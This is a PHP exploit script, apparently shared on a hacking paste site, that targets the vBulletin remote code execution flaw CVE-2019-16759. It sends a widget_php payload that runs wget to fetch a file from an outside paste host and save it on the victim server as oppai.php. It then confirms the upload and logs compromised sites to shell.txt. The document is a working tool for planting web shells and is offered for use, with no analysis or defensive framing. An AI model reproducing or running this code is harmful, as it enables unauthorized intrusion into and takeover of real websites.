vbulletin RCE CVE-2019-16759 bypass direct

1. <?php
2. /*  vbulletin RCE CVE-2019-16759 bypass direct
3. langsung crot
4. Mantod ganteng
5. source : https://pastebin.com/raw/eb9Frt8D
6.  */
7.  error_reporting(0);
8.  echo " ~] Url to vBulletin : ";
9. $url = trim(fgets(STDIN));
10.         $d = "subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo passthru('wget -S https://ghostbin.co/paste/g2gen/raw -O oppai.php');";
11.     $vb     = curl_init();
12.     curl_setopt($vb, CURLOPT_URL, $url . '/ajax/render/widget_tabbedcontainer_tab_panel');
13.     curl_setopt($vb, CURLOPT_RETURNTRANSFER, 1);
14.     curl_setopt($vb, CURLOPT_FOLLOWLOCATION, 1);
15.     curl_setopt ($vb, CURLOPT_SSL_VERIFYPEER, 0);
16.     curl_setopt ($vb, CURLOPT_SSL_VERIFYHOST, 0);
17.         curl_setopt($vb, CURLOPT_TIMEOUT, 10);
18.     curl_setopt($vb, CURLOPT_POSTFIELDS, $d);
19.     $memek = curl_exec($vb);
20.     curl_close($vb);
21.     $tempek = curl_init();
22.     curl_setopt($tempek, CURLOPT_URL, $url . '/oppai.php');
23.     curl_setopt($tempek, CURLOPT_RETURNTRANSFER, 1);
24.     curl_setopt($tempek, CURLOPT_FOLLOWLOCATION, 1);
25.     $pu    = curl_exec($tempek);
26.     $bjirr = curl_getinfo($tempek, CURLINFO_HTTP_CODE);
27.     curl_close($tempek);
28.     if ($bjirr == 200) {
29.         echo "$url saved (shell.txt)\n";
30.         $save = 'shell.txt';
31.             $seve = fopen($save, 'a+') or die('Cannot open file:  '.$save);
32.             $data = $url . '/oppai.php';
33.             fwrite($seve, "\n".$data);
34.             fclose($seve);
35.     } else if ($bjirr == 404) {
36.         echo "not vuln\n";
37.     }
38.     else if ($bjirr == 403) {
39.         echo "not vuln\n";
40.     }
41.     else if ($bjirr == 400) {
42.         echo "not vuln\n";
43.     }
44.     else if ($bjirr == 500) {
45.         echo "not vuln\n";
46.     }
47.     else if ($bjirr == 301) {
48.         echo "not vuln\n";
49.     }
50.     else if ($bjirr == 503) {
51.         echo "not vuln\n";
52.     }
53.     ?>